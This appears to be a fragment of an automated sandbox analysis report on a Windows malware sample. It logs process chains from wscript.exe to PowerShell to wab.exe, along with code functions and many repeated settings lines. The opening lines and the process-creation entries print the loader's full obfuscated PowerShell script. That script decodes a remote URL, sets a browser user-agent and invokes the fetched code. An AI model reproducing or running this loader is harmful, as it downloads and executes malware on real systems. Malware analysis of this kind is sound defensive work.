';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 10_2_004044A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B955479 push ebp; iretd 1_2_00007FFD9B955538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_02A5EC78 pushfd ; retf 4_2_02A5EC79
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06E40000 push es; retf 4_2_06E40014
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06E481A1 push esi; retf 4_2_06E481A2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_06E41D28 push eax; mov dword ptr [esp], ecx 4_2_06E421B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08A05E8C push ebp; retf 4_2_08A05E98
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08A02030 push FFFFFFABh; iretd 4_2_08A02044
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08A00D1E push cs; ret 4_2_08A00D21
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08A05F4B push ss; retf 4_2_08A05F5B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08A01B52 push esi; iretd 4_2_08A01B53
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_08A06D58 push ebx; iretd 4_2_08A06D59
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_22792806 push ecx; ret 9_2_22792819
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_04462030 push FFFFFFABh; iretd 9_2_04462044
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_04466D58 push ebx; iretd 9_2_04466D59
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_04460D1E push cs; ret 9_2_04460D21
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_04465E8C push ebp; retf 9_2_04465E98
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_04465F4B push ss; retf 9_2_04465F5B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_04461B52 push esi; iretd 9_2_04461B53
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0044693D push ecx; ret 10_2_0044694D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0044DB70 push eax; ret 10_2_0044DB84
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0044DB70 push eax; ret 10_2_0044DBAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_00451D54 push eax; ret 10_2_00451D61
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044B090 push eax; ret 11_2_0044B0A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044B090 push eax; ret 11_2_0044B0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00444E71 push ecx; ret 11_2_00444E81
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00414060 push eax; ret 12_2_00414074
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00414060 push eax; ret 12_2_0041409C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00414039 push ecx; ret 12_2_00414049
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_004164EB push 0000006Ah; retf 12_2_004165C4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00416553 push 0000006Ah; retf 12_2_004165C4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00416555 push 0000006Ah; retf 12_2_004165C4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 11_2_004047CB
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
